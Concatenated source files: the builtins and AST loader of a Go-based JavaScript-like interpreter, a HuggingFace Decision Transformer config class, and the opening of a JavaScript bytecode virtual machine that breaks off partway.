vlue := (*dt[0]).(*object.Environment).Store
return &object.NumericObject{Value: float64(len(vlue.M))}
}
return &object.NumericObject{Value: float64(0)}
}
func Math_Ramdom(myfun *object.FunctionDeclarationObject) object.Object {
//dt := myfun.Args
randomValue := rand.Float64()
return &object.NumericObject{Value: randomValue}
}
func Math_Pow(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args[0]
dte := (*dt).(*object.NumericObject).Value
dt2 := (*myfun.Args[1]).(*object.NumericObject).Value
dd := math.Pow(dte, dt2)
return &object.NumericObject{Value: dd}
}
func Math_Sqrt(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args[0]
dte := (*dt).(*object.NumericObject).Value
dd := math.Sqrt(dte)
return &object.NumericObject{Value: dd}
}
func Objecte_setPrototypeOf(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args[0]
dtold := myfun.Args[1]
newOne := (*dt).(*object.Environment)
oldOne := (*dtold).(*object.Environment)
newOne.Outer = oldOne
return &object.NULLObject{}
}
func JSON_stringify(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args[0]
newOne := (*dt).(*object.Environment)
return parsejson.JsonToStr(newOne)
}
func CONSOLE_log(myfun *object.FunctionDeclarationObject) object.Object {
for idx, v := range myfun.Args {
fmt.Printf((*v).ToString())
if idx != len(myfun.Args)-1 {
fmt.Printf(" ")
}
}
fmt.Printf("\n")
return &object.NULLObject{}
}
func String_fromCharCode(myfun *object.FunctionDeclarationObject) object.Object {
dtw := int((*myfun.Args[0]).(*object.NumericObject).Value)
s := strconv.Itoa(dtw)
return &object.StringObject{Value: s}
}
func String_strip(myfun *object.FunctionDeclarationObject) object.Object {
dtw := (*myfun.Args[0]).(*object.StringObject).Value
s := strings.TrimSpace(dtw)
return &object.StringObject{Value: s}
}
func String_replace(myfun *object.FunctionDeclarationObject) object.Object {
dtw := (*myfun.Args[0]).(*object.StringObject).Value
dtw2 := (*myfun.Args[1]).(*object.StringObject).Value
dtw3 := (*myfun.Args[2]).(*object.StringObject).Value
s := strings.Replace(dtw, dtw2, dtw3, -1)
return &object.StringObject{Value: s}
}
func String_split(myfun *object.FunctionDeclarationObject) object.Object {
dtw := (*myfun.Args[0]).(*object.StringObject).Value
dtw2 := (*myfun.Args[1]).(*object.StringObject).Value
allslist := strings.Split(dtw, dtw2)
ddd := object.NewArray()
for _, vd := range allslist {
d := &object.StringObject{Value: vd}
var j object.Object = d
ddd.Value = append(ddd.Value, &j)
}
return &ddd
}
func String_newbyte(myfun *object.FunctionDeclarationObject) object.Object {
dtw := (*myfun.Args[0]).(*object.Environment).Value
dnnnnnn := make([]byte, len(dtw))
for idx, dt := range dtw {
f := (*dt).Type()
if f == token.TYNUM {
b := (*dt).(*object.NumericObject).Value
dnnnnnn[idx] = byte(b)
} else {
dnnnnnn[idx] = 0
}
}
return &object.ByteObject{Value: dnnnnnn}
}
func String_decode(myfun *object.FunctionDeclarationObject) object.Object {
dtw := (*myfun.Args[0]).(*object.ByteObject).Value
var bian string = "utf-8"
if len(myfun.Args) >= 2 {
bian = (*myfun.Args[1]).(*object.StringObject).Value
}
if bian == "gbk" {
decoder := simplifiedchinese.GBK.NewDecoder()
// 使用GBK解码器将字节数组转换为字符串
reader := transform.NewReader(bytes.NewReader(dtw), decoder)
decodedBytes, _ := ioutil.ReadAll(reader)
return &object.StringObject{Value: string(decodedBytes)}
} else if bian == "utf-8" {
return &object.StringObject{Value: string(dtw)}
} else {
return &object.StringObject{Value: string(dtw)}
}
}
func String_encode(myfun *object.FunctionDeclarationObject) object.Object {
dtw := (*myfun.Args[0]).(*object.StringObject).Value
var bian string = "utf-8"
if len(myfun.Args) >= 2 {
bian = (*myfun.Args[1]).(*object.StringObject).Value
}
if bian == "gbk" {
encoder := simplifiedchinese.GBK.NewEncoder()
// 使用GBK解码器将字节数组转换为字符串
var buf bytes.Buffer
writer := transform.NewWriter(&buf, encoder)
writer.Write([]byte(dtw))
writer.Close()
byteArray := buf.Bytes()
return &object.ByteObject{Value: byteArray}
} else if bian == "utf-8" {
byteArray := []byte(dtw)
return &object.ByteObject{Value: byteArray}
} else {
byteArray := []byte(dtw)
return &object.ByteObject{Value: byteArray}
}
}
func Date_now(myfun *object.FunctionDeclarationObject) object.Object {
currentTime := time.Now()
timestampMillis := currentTime.UnixNano() / int64(time.Millisecond)
return &object.NumericObject{Value: float64(timestampMillis)}
}
func Date_sleep(myfun *object.FunctionDeclarationObject) object.Object {
dd := int((*myfun.Args[0]).(*object.NumericObject).Value)
time.Sleep(time.Duration(dd) * time.Millisecond)
return &object.NULLObject{}
}
func Cyhttp_toJSON(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Env.Store
jsdt, ok := dt.Get(token.Jsontext)
if ok {
return jsdt
}
text, _ := dt.Get(token.Text)
dstest := text.(*object.StringObject)
JsonDt := parsejson.ParseStrToJson(dstest.Value)
dt.Set(token.Jsontext, JsonDt)
return JsonDt
}
func Cyhttp_ReHeaders(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Env.Store
jsdt, ok := dt.Get(token.Headerstext)
if ok {
return jsdt
}
text, _ := dt.Get(token.Headerstext2)
dstest := text.(*object.StringObject)
JsonDt := parsejson.ParseStrToJson(dstest.Value)
dt.Set(token.Headerstext, JsonDt)
return JsonDt
}
func Cyhttp_get(myfun *object.FunctionDeclarationObject) object.Object {
url := (*myfun.Args[0]).(*object.StringObject).Value
var huuu3 *object.Object
if len(myfun.Args) < 2 {
gg := object.NewObject()
var h object.Object = &gg
huuu3 = &h
} else {
huuu3 = myfun.Args[1]
}
timeOut := 40
var huuu *object.Environment
config := (*huuu3).(*object.Environment)
huuue, ok := config.Store.Get(token.Headers)
timeout, ok2 := config.Store.Get(token.Timeout)
ParamsObj, ok3 := config.Store.Get(token.Params)
Allow_redirectsTrue, ok4 := config.Store.Get(token.Allow_redirects)
ProxiesStr, ok5 := config.Store.Get(token.Proxies)
proxyStr := ""
if ok5 {
proxyStr = ProxiesStr.(*object.StringObject).Value
}
isAllow := true
if ok4 {
isAllow = Allow_redirectsTrue.(*object.BoolObject).Value
}
var Params map[string]string
if ok3 {
Params = map[string]string{}
gyyy := ParamsObj.(*object.Environment)
Keys := []string{}
for key, _ := range gyyy.Store.M {
Keys = append(Keys, key)
}
for _, key2 := range Keys {
deee, _ := gyyy.Store.Get(key2)
Params[key2] = deee.ToString()
}
} else {
Params = nil
}
if ok2 {
dhhh := timeout.(*object.NumericObject).Value
timeOut = int(dhhh)
}
if ok == false {
dss := object.NewObject()
huuu = &dss
} else {
huuu = (huuue).(*object.Environment)
}
headersOb := huuu.Store.M
Keys := []string{}
for key, _ := range headersOb {
Keys = append(Keys, key)
}
headers := map[string]string{}
for _, key2 := range Keys {
deee, _ := huuu.Store.Get(key2)
headers[key2] = deee.ToString()
}
req := http.GetHttp(url, headers, int64(timeOut), Params, isAllow, proxyStr)
reqdt := object.NewObject()
reqdt.Store.Set(token.Status, &object.StringObject{Value: req.Status})
reqdt.Store.Set(token.Iserror, &object.BoolObject{Value: req.IsError})
reqdt.Store.Set(token.Content, &object.ByteObject{Value: req.Content})
reqdt.Store.Set(token.Text, &object.StringObject{Value: req.Text})
reqdt.Store.Set(token.Headerstext2, &object.StringObject{Value: req.ReHeaders})
cyhttp_toJSON := Cyhttp_toJSON
icyhttp_toJSON := new_Func(&cyhttp_toJSON)
i2cyhttp_toJSON := icyhttp_toJSON.(*object.FunctionDeclarationObject)
i2cyhttp_toJSON.Env = &reqdt
reqdt.Store.Set(token.Json, i2cyhttp_toJSON)
cyhttp_ReHeaders := Cyhttp_ReHeaders
icyhttp_ReHeaders := new_Func(&cyhttp_ReHeaders)
i2cyhttp_ReHeaders := icyhttp_ReHeaders.(*object.FunctionDeclarationObject)
i2cyhttp_ReHeaders.Env = &reqdt
reqdt.Store.Set(token.Cyhttp_ReHeaders, i2cyhttp_ReHeaders)
return &reqdt
}
func Cyhttp_post(myfun *object.FunctionDeclarationObject) object.Object {
url := (*myfun.Args[0]).(*object.StringObject).Value
var huuu3 *object.Object
if len(myfun.Args) < 2 {
gg := object.NewObject()
var h object.Object = &gg
huuu3 = &h
} else {
huuu3 = myfun.Args[1]
}
timeOut := 40
var huuu *object.Environment
headers := map[string]string{}
config := (*huuu3).(*object.Environment)
huuue, ok := config.Store.Get(token.Headers)
timeout, ok2 := config.Store.Get(token.Timeout)
ParamsObj, ok3 := config.Store.Get(token.Params)
Allow_redirectsTrue, ok4 := config.Store.Get(token.Allow_redirects)
ProxiesStr, ok5 := config.Store.Get(token.Proxies)
JsonObj, ok6 := config.Store.Get(token.Json)
podata := ""
if ok6 {
podatjson := JsonObj.(*object.Environment)
headers["Accept"] = "application/json"
podata = parsejson.JsonToStr(podatjson).(*object.StringObject).Value
} else {
DataTest, ok7 := config.Store.Get(token.Data)
if ok7 {
podata = DataTest.ToString()
}
}
proxyStr := ""
if ok5 {
proxyStr = ProxiesStr.(*object.StringObject).Value
}
isAllow := true
if ok4 {
isAllow = Allow_redirectsTrue.(*object.BoolObject).Value
}
var Params map[string]string
if ok3 {
Params = map[string]string{}
gyyy := ParamsObj.(*object.Environment)
Keys := []string{}
for key, _ := range gyyy.Store.M {
Keys = append(Keys, key)
}
for _, key2 := range Keys {
deee, _ := gyyy.Store.Get(key2)
Params[key2] = deee.ToString()
}
} else {
Params = nil
}
if ok2 {
dhhh := timeout.(*object.NumericObject).Value
timeOut = int(dhhh)
}
if ok == false {
dss := object.NewObject()
huuu = &dss
} else {
huuu = (huuue).(*object.Environment)
}
headersOb := huuu.Store.M
Keys := []string{}
for key, _ := range headersOb {
Keys = append(Keys, key)
}
for _, key2 := range Keys {
deee, _ := huuu.Store.Get(key2)
headers[key2] = deee.ToString()
}
req := http.PostHttp(url, headers, int64(timeOut), Params, isAllow, proxyStr, podata)
reqdt := object.NewObject()
reqdt.Store.Set(token.Status, &object.StringObject{Value: req.Status})
reqdt.Store.Set(token.Iserror, &object.BoolObject{Value: req.IsError})
reqdt.Store.Set(token.Text, &object.StringObject{Value: req.Text})
reqdt.Store.Set(token.Content, &object.ByteObject{Value: req.Content})
reqdt.Store.Set(token.Headerstext2, &object.StringObject{Value: req.ReHeaders})
cyhttp_toJSON := Cyhttp_toJSON
icyhttp_toJSON := new_Func(&cyhttp_toJSON)
i2cyhttp_toJSON := icyhttp_toJSON.(*object.FunctionDeclarationObject)
i2cyhttp_toJSON.Env = &reqdt
reqdt.Store.Set(token.Json, i2cyhttp_toJSON)
cyhttp_ReHeaders := Cyhttp_ReHeaders
icyhttp_ReHeaders := new_Func(&cyhttp_ReHeaders)
i2cyhttp_ReHeaders := icyhttp_ReHeaders.(*object.FunctionDeclarationObject)
i2cyhttp_ReHeaders.Env = &reqdt
reqdt.Store.Set(token.Cyhttp_ReHeaders, i2cyhttp_ReHeaders)
return &reqdt
}
func JSON_parse(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args[0]
jsonStr := (*dt).(*object.StringObject)
ddd := parsejson.ParseStrToJson(jsonStr.Value)
return ddd
}
func Objecte_keys(myfun *object.FunctionDeclarationObject) object.Object {
dt := myfun.Args[0]
dtInfo := (*dt).(*object.Environment)
allk := object.NewArray()
for key, _ := range dtInfo.Store.M {
sko := &object.StringObject{Value: key}
var kp object.Object = sko
allk.Value = append(allk.Value, &kp)
}
return &allk
}
func NewEnv(eg *object.Environment) *object.Environment {
s := object.NewSafeMap()
env := &object.Environment{Store: s, Outer: eg, TypeInfo: token.THIS}
return env
}
func new_Func(ddd *func(*object.FunctionDeclarationObject) object.Object) object.Object {
d := &object.FunctionDeclarationObject{IsNative: 1, NativeBody: ddd}
return d
}
func Init() (map[string]object.Object, map[string]*object.Environment) {
rand.Seed(time.Now().UnixNano())
getlength := GetLength
input := Input
cyPrint := CyPrint
getChar := GetChar
charToStr := CharToStr
appendArray := AppendArray
parseInt := ParseInt
parseFloat := ParseFloat
deletee := Delete
//getToken := GetToken
gy := make(map[string]object.Object)
gy[token.GetLength] = new_Func(&getlength)
gy[token.Print] = new_Func(&cyPrint)
gy[token.GetChar] = new_Func(&getChar)
gy[token.CharToStr] = new_Func(&charToStr)
gy[token.AppendArray] = new_Func(&appendArray)
gy[token.Delete] = new_Func(&deletee)
gy[token.ParseInt] = new_Func(&parseInt)
gy[token.ParseFloat] = new_Func(&parseFloat)
gy[token.Input] = new_Func(&input)
//gy[token.GetToken] = &getToken
dxhs := make(map[string]*object.Environment)
// Math ---------------------
Math := NewEnv(nil)
dxhs[token.Math] = Math
// Math_Ramdom ---------------
math_Ramdom := Math_Ramdom
Math.Store.Set(token.Math_random, new_Func(&math_Ramdom))
// Math_Pow ---------------
math_Pow := Math_Pow
Math.Store.Set(token.Math_Pow, new_Func(&math_Pow))
// Math_Sqrt ---------------
math_Sqrt := Math_Sqrt
Math.Store.Set(token.Math_Sqrt, new_Func(&math_Sqrt))
// Object --------------------
Object := NewEnv(nil)
dxhs[token.Objecte] = Object
// Object_setPrototypeOf --------------------
objecte_setPrototypeOf := Objecte_setPrototypeOf
Object.Store.Set(token.Objecte_setPrototypeOf, new_Func(&objecte_setPrototypeOf))
// Object_keys --------------------
ojecte_keys := Objecte_keys
Object.Store.Set(token.Objecte_keys, new_Func(&ojecte_keys))
// JSON --------------------
JSON := NewEnv(nil)
dxhs[token.JSON] = JSON
// JSON_stringify --------------------
jSON_stringify := JSON_stringify
JSON.Store.Set(token.JSON_stringify, new_Func(&jSON_stringify))
// JSON_parse --------------------
jSON_parse := JSON_parse
JSON.Store.Set(token.JSON_parse, new_Func(&jSON_parse))
// CONSOLE --------------------
CONSOLE := NewEnv(nil)
dxhs[token.CONSOLE] = CONSOLE
// CONSOLE_log --------------------
cONSOLE_log := CONSOLE_log
CONSOLE.Store.Set(token.CONSOLE_log, new_Func(&cONSOLE_log))
// String --------------------
String := NewEnv(nil)
dxhs[token.String] = String
// String_fromCharCode --------------------
string_fromCharCode := String_fromCharCode
String.Store.Set(token.String_fromCharCode, new_Func(&string_fromCharCode))
// String_strip --------------------
string_strip := String_strip
String.Store.Set(token.String_strip, new_Func(&string_strip))
// String_replace --------------------
string_replace := String_replace
String.Store.Set(token.String_replace, new_Func(&string_replace))
// String_split --------------------
string_split := String_split
String.Store.Set(token.String_split, new_Func(&string_split))
// String_decode --------------------
string_decode := String_decode
String.Store.Set(token.String_decode, new_Func(&string_decode))
// String_encode --------------------
string_encode := String_encode
String.Store.Set(token.String_encode, new_Func(&string_encode))
// String_newbyte --------------------
string_newbyte := String_newbyte
String.Store.Set(token.String_newbyte, new_Func(&string_newbyte))
// Date --------------------
Date := NewEnv(nil)
dxhs[token.Date] = Date
// Date_now --------------------
date_now := Date_now
Date.Store.Set(token.Date_now, new_Func(&date_now))
// Date_sleep --------------------
date_sleep := Date_sleep
Date.Store.Set(token.Date_sleep, new_Func(&date_sleep))
// Fs --------------------
Fs := NewEnv(nil)
dxhs[token.Fs] = Fs
// Fs_open --------------------
fs_open := fs.Fs_open
Fs.Store.Set(token.Fs_open, new_Func(&fs_open))
// Fs_cmd --------------------
Fs_cmd := fs.Fs_cmd
Fs.Store.Set(token.Fs_cmd, new_Func(&Fs_cmd))
// Cyhttp --------------------
Cyhttp := NewEnv(nil)
dxhs[token.Cyhttp] = Cyhttp
// Cyhttp_get --------------------
cyhttp_get := Cyhttp_get
Cyhttp.Store.Set(token.Cyhttp_get, new_Func(&cyhttp_get))
// Cyhttp_get --------------------
cyhttp_post := Cyhttp_post
Cyhttp.Store.Set(token.Cyhttp_post, new_Func(&cyhttp_post))
// Etree --------------------
Etree := NewEnv(nil)
dxhs[token.Etree] = Etree
// Cyhttp_get --------------------
etree_HTML := etree.Etree_HTML
Etree.Store.Set(token.Etree_HTML, new_Func(&etree_HTML))
// Re --------------------
Re := NewEnv(nil)
dxhs[token.Re] = Re
// Re_findall --------------------
re_findall := re.Re_findall
Re.Store.Set(token.Re_findall, new_Func(&re_findall))
// Re_findall --------------------
re_sub := re.Re_sub
Re.Store.Set(token.Re_sub, new_Func(&re_sub))
return gy, dxhs
}
|
2833844911/gojsvmp | 7,822 | parseToDt/parseToDt.go | package parseToDt
import (
"encoding/json"
"fmt"
"myvmp/ast"
"myvmp/token"
)
func PrushData(dt ast.Statement) string {
jsonString, _ := json.Marshal(dt)
return string(jsonString)
}
func parseAST(data map[string]interface{}, astInfo *ast.Statement) ast.Statement {
typee := data["TypeInfo"].(string)
switch typee {
case token.Prog:
dt := &ast.Program{Body: make([]*ast.Statement, 0)}
kss := data["Body"].([]interface{})
for _, value := range kss {
lpp := value.(map[string]interface{})
lpm2 := parseAST(lpp, nil)
dt.Body = append(dt.Body, &lpm2)
}
return dt
case token.IDENT:
kss := data["Name"].(string)
dt := &ast.Identifier{Name: kss}
return dt
case token.NULL:
kss := data["Value"].(string)
dt := &ast.NullIdentifier{Value: kss}
return dt
case token.INT:
kss := data["Value"].(float64)
dt := &ast.NumericLiteral{Value: kss}
return dt
case token.VAR:
dt := &ast.VariableDeclaration{Declarations: make([]*ast.Statement, 0)}
kss := data["Declarations"].([]interface{})
for _, value := range kss {
lpp := value.(map[string]interface{})
lpm2 := parseAST(lpp, nil)
dt.Declarations = append(dt.Declarations, &lpm2)
}
dt.Init = parseAST(data["Init"].(map[string]interface{}), nil)
return dt
case token.Bin:
left := parseAST(data["Left"].(map[string]interface{}), nil)
right := parseAST(data["Right"].(map[string]interface{}), nil)
Operator := data["Operator"].(string)
dt := &ast.BinaryExpression{Operator: Operator, Left: left, Right: right}
return dt
case token.NOP:
return &ast.NOP{}
case token.OVER:
return &ast.OVER{}
case token.Ass:
left := parseAST(data["Left"].(map[string]interface{}), nil)
right := parseAST(data["Right"].(map[string]interface{}), nil)
Operator := data["Operator"].(string)
dt := &ast.AssignmentExpression{Operator: Operator, Left: left, Right: right}
return dt
case token.Call:
dt := &ast.CallExpression{Arguments: make([]*ast.Statement, 0)}
kss := data["Arguments"].([]interface{})
for _, value := range kss {
lpp := value.(map[string]interface{})
lpm2 := parseAST(lpp, nil)
dt.Arguments = append(dt.Arguments, &lpm2)
}
Caller := parseAST(data["Caller"].(map[string]interface{}), nil)
dt.Caller = Caller
return dt
case token.IfStat:
Test := parseAST(data["Test"].(map[string]interface{}), nil)
Consequent := parseAST(data["Consequent"].(map[string]interface{}), nil)
var Alternate ast.Statement
if data["Alternate"] != nil {
Alternate = parseAST(data["Alternate"].(map[string]interface{}), nil)
} else {
Alternate = nil
}
dt := &ast.IfStatement{Test: Test, Consequent: Consequent, Alternate: Alternate}
return dt
case token.Block:
dt := &ast.BlockStatement{Body: make([]*ast.Statement, 0)}
kss := data["Body"].([]interface{})
for _, value := range kss {
lpp := value.(map[string]interface{})
lpm2 := parseAST(lpp, nil)
dt.Body = append(dt.Body, &lpm2)
}
return dt
case token.Unary:
Argument := parseAST(data["Argument"].(map[string]interface{}), nil)
Prefix := data["Prefix"].(bool)
Operator := data["Operator"].(string)
dt := &ast.UnaryExpression{
Argument: Argument,
Operator: Operator,
Prefix: Prefix,
}
return dt
case token.FuncD:
Id := parseAST(data["Id"].(map[string]interface{}), nil)
Body := parseAST(data["Body"].(map[string]interface{}), nil)
dt := &ast.FunctionDeclaration{Id: Id, Body: Body, Params: make([]*ast.Statement, 0)}
kss := data["Params"].([]interface{})
for _, value := range kss {
lpp := value.(map[string]interface{})
lpm2 := parseAST(lpp, nil)
dt.Params = append(dt.Params, &lpm2)
}
return dt
case token.FuncE:
var Id ast.Statement
if data["Id"] != nil {
Id = parseAST(data["Id"].(map[string]interface{}), nil)
} else {
Id = nil
}
Body := parseAST(data["Body"].(map[string]interface{}), nil)
dt := &ast.FunctionExpression{Id: Id, Body: Body, Params: make([]*ast.Statement, 0)}
kss := data["Params"].([]interface{})
for _, value := range kss {
lpp := value.(map[string]interface{})
lpm2 := parseAST(lpp, nil)
dt.Params = append(dt.Params, &lpm2)
}
return dt
case token.Member:
Object := parseAST(data["Object"].(map[string]interface{}), nil)
Property := parseAST(data["Property"].(map[string]interface{}), nil)
dt := &ast.MemberExpression{
Object: Object,
Property: Property,
}
return dt
case token.Stri:
kss := data["Value"].(string)
dt := &ast.StringLiteral{
Value: kss,
}
return dt
case token.THIS:
tthis := &ast.ThisExpression{}
return tthis
case token.BREAK:
dt := &ast.BreakStatement{}
return dt
case token.CONTINUE:
dt := &ast.ContinueStatement{}
return dt
case token.ForS:
var Init ast.Statement
var Test ast.Statement
var Updata ast.Statement
if data["Init"] != nil {
Init = parseAST(data["Init"].(map[string]interface{}), nil)
}
if data["Test"] != nil {
Test = parseAST(data["Test"].(map[string]interface{}), nil)
}
if data["Updata"] != nil {
Updata = parseAST(data["Updata"].(map[string]interface{}), nil)
}
Body := parseAST(data["Body"].(map[string]interface{}), nil)
dt := &ast.ForStatement{
Init: Init,
Body: Body,
Updata: Updata,
Test: Test,
}
return dt
case token.ForI:
var Init ast.Statement
var Test ast.Statement
if data["Left"] != nil {
Init = parseAST(data["Left"].(map[string]interface{}), nil)
}
if data["Right"] != nil {
Test = parseAST(data["Right"].(map[string]interface{}), nil)
}
Body := parseAST(data["Body"].(map[string]interface{}), nil)
dt := &ast.ForInStatement{
Left: Init,
Body: Body,
Right: Test,
}
return dt
case token.ArrayE:
dt := &ast.ArrayExpression{Elements: make([]*ast.Statement, 0)}
kss := data["Elements"].([]interface{})
for _, value := range kss {
lpp := value.(map[string]interface{})
lpm2 := parseAST(lpp, nil)
dt.Elements = append(dt.Elements, &lpm2)
}
return dt
case token.Object:
dt := &ast.ObjectExpression{Properties: make([]*ast.Statement, 0)}
kss := data["Properties"].([]interface{})
for _, value := range kss {
lpp := value.(map[string]interface{})
lpm2 := parseAST(lpp, nil)
dt.Properties = append(dt.Properties, &lpm2)
}
return dt
case token.Prop:
Key := parseAST(data["Key"].(map[string]interface{}), nil)
Value := parseAST(data["Value"].(map[string]interface{}), nil)
dt := &ast.Property{Key: Key, Value: Value}
return dt
case token.TRY:
Block := parseAST(data["Block"].(map[string]interface{}), nil)
Handler := parseAST(data["Handler"].(map[string]interface{}), nil)
dt := &ast.TryStatement{Block: Block, Handler: Handler}
return dt
case token.CATCH:
var Param ast.Statement
if Param != nil {
Param = parseAST(data["Param"].(map[string]interface{}), nil)
} else {
Param = nil
}
Body := parseAST(data["Body"].(map[string]interface{}), nil)
dt := &ast.CatchClause{Param: Param, Body: Body}
return dt
case token.RETURN:
Argument := parseAST(data["Argument"].(map[string]interface{}), nil)
dt := &ast.ReturnStatement{Argument: Argument}
return dt
case token.Debug:
dt := &ast.DebugStatement{}
return dt
case token.NEW:
Callee := parseAST(data["Callee"].(map[string]interface{}), nil)
dt := &ast.NewExpression{Callee: Callee, Arguments: make([]*ast.Statement, 0)}
kss := data["Arguments"].([]interface{})
for _, value := range kss {
lpp := value.(map[string]interface{})
lpm2 := parseAST(lpp, nil)
dt.Arguments = append(dt.Arguments, &lpm2)
}
return dt
}
return nil
}
func LoadStr(dd string) ast.Statement {
var data map[string]interface{}
if err := json.Unmarshal([]byte(dd), &data); err != nil {
fmt.Println("Error parsing JSON:", err)
return nil
}
return parseAST(data, nil)
}
|
27182812/ChatGLM-LLaMA-chinese-insturct | 7,323 | src/transformers/models/decision_transformer/configuration_decision_transformer.py | # coding=utf-8
# Copyright 2022 The HuggingFace Team and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Decision Transformer model configuration"""
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
DECISION_TRANSFORMER_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"edbeeching/decision-transformer-gym-hopper-medium": (
"https://huggingface.co/edbeeching/decision-transformer-gym-hopper-medium/resolve/main/config.json"
),
# See all DecisionTransformer models at https://huggingface.co/models?filter=decision_transformer
}
class DecisionTransformerConfig(PretrainedConfig):
"""
This is the configuration class to store the configuration of a [`DecisionTransformerModel`]. It is used to
instantiate a Decision Transformer model according to the specified arguments, defining the model architecture.
Instantiating a configuration with the defaults will yield a similar configuration to that of the standard
DecisionTransformer architecture. Many of the config options are used to instatiate the GPT2 model that is used as
part of the architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
state_dim (`int`, *optional*, defaults to 17):
The state size for the RL environment
act_dim (`int`, *optional*, defaults to 4):
The size of the output action space
hidden_size (`int`, *optional*, defaults to 128):
The size of the hidden layers
max_ep_len (`int`, *optional*, defaults to 4096):
The maximum length of an episode in the environment
action_tanh (`bool`, *optional*, defaults to True):
Whether to use a tanh activation on action prediction
vocab_size (`int`, *optional*, defaults to 50257):
Vocabulary size of the GPT-2 model. Defines the number of different tokens that can be represented by the
`inputs_ids` passed when calling [`DecisionTransformerModel`].
n_positions (`int`, *optional*, defaults to 1024):
The maximum sequence length that this model might ever be used with. Typically set this to something large
just in case (e.g., 512 or 1024 or 2048).
n_layer (`int`, *optional*, defaults to 12):
Number of hidden layers in the Transformer encoder.
n_head (`int`, *optional*, defaults to 12):
Number of attention heads for each attention layer in the Transformer encoder.
n_inner (`int`, *optional*):
Dimensionality of the inner feed-forward layers. If unset, will default to 4 times `n_embd`.
activation_function (`str`, *optional*, defaults to `"gelu"`):
Activation function, to be selected in the list `["relu", "silu", "gelu", "tanh", "gelu_new"]`.
resid_pdrop (`float`, *optional*, defaults to 0.1):
The dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
embd_pdrop (`int`, *optional*, defaults to 0.1):
The dropout ratio for the embeddings.
attn_pdrop (`float`, *optional*, defaults to 0.1):
The dropout ratio for the attention.
layer_norm_epsilon (`float`, *optional*, defaults to 1e-5):
The epsilon to use in the layer normalization layers.
initializer_range (`float`, *optional*, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
scale_attn_weights (`bool`, *optional*, defaults to `True`):
Scale attention weights by dividing by sqrt(hidden_size)..
use_cache (`bool`, *optional*, defaults to `True`):
Whether or not the model should return the last key/values attentions (not used by all models).
scale_attn_by_inverse_layer_idx (`bool`, *optional*, defaults to `False`):
Whether to additionally scale attention weights by `1 / layer_idx + 1`.
reorder_and_upcast_attn (`bool`, *optional*, defaults to `False`):
Whether to scale keys (K) prior to computing attention (dot-product) and upcast attention
dot-product/softmax to float() when training with mixed precision.
Example:
```python
>>> from transformers import DecisionTransformerConfig, DecisionTransformerModel
>>> # Initializing a DecisionTransformer configuration
>>> configuration = DecisionTransformerConfig()
>>> # Initializing a model (with random weights) from the configuration
>>> model = DecisionTransformerModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
```"""
model_type = "decision_transformer"
keys_to_ignore_at_inference = ["past_key_values"]
attribute_map = {
"max_position_embeddings": "n_positions",
"num_attention_heads": "n_head",
"num_hidden_layers": "n_layer",
}
def __init__(
self,
state_dim=17,
act_dim=4,
hidden_size=128,
max_ep_len=4096,
action_tanh=True,
vocab_size=1,
n_positions=1024,
n_layer=3,
n_head=1,
n_inner=None,
activation_function="relu",
resid_pdrop=0.1,
embd_pdrop=0.1,
attn_pdrop=0.1,
layer_norm_epsilon=1e-5,
initializer_range=0.02,
scale_attn_weights=True,
use_cache=True,
bos_token_id=50256,
eos_token_id=50256,
scale_attn_by_inverse_layer_idx=False,
reorder_and_upcast_attn=False,
**kwargs,
):
self.state_dim = state_dim
self.act_dim = act_dim
self.hidden_size = hidden_size
self.max_ep_len = max_ep_len
self.action_tanh = action_tanh
self.vocab_size = vocab_size
self.n_positions = n_positions
self.n_layer = n_layer
self.n_head = n_head
self.n_inner = n_inner
self.activation_function = activation_function
self.resid_pdrop = resid_pdrop
self.embd_pdrop = embd_pdrop
self.attn_pdrop = attn_pdrop
self.layer_norm_epsilon = layer_norm_epsilon
self.initializer_range = initializer_range
self.scale_attn_weights = scale_attn_weights
self.use_cache = use_cache
self.scale_attn_by_inverse_layer_idx = scale_attn_by_inverse_layer_idx
self.reorder_and_upcast_attn = reorder_and_upcast_attn
self.bos_token_id = bos_token_id
self.eos_token_id = eos_token_id
super().__init__(bos_token_id=bos_token_id, eos_token_id=eos_token_id, **kwargs)
|
2833844911/cy_jsvmp | 18,188 | tool/jsvmp_02.js | function cltothis(cythis, poolList,off){
for (let i in poolList){
if (off == 1){
cythis[i] = undefined
}else{
cythis[i] = poolList[i];
}
}
}
function cbb_jsvmp(all, duei, start, shuz,argsList, ogg, op) {
function getproto(s,d,e){
let dt = s;
for ( ;1==1;){
if (s.hasOwnProperty(d)){
try{
s[d] = e
}catch(e2){
window[d] = e
return
}
break
}else{
s = s.__proto__
if (s == undefined || s==null){
window[d] = e
return
}
}
}
}
if (op !==undefined){
var allthis
allthis = op['allthis']
duei = op.duei
all = op.all
shuz = op.shuz
argsList = op.argsList
var a1,a2,a3,a4,a5,a6,a7,a8,a9,j, j2,i ;
a7 = op.a7
var args = op.args
var cbbb = op.cbbb;
}else{
var allthis
if (ogg !== undefined){
allthis = ogg
}else{
allthis = all
}
var a1,a2,a3,a4,a5,a6,a7,a8,a9,j, j2, i;
var args = []
var cbbb = all;
}
while (!![]) {
let s_cbb = shuz[start++];
switch(s_cbb){
case 23:
all = cbbb
duei.push(cbbb)
break
case 47:
duei.push(allthis)
break
case 36:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 <= a1;
duei.push(a1)
break
case 37:
a1 = duei.pop()
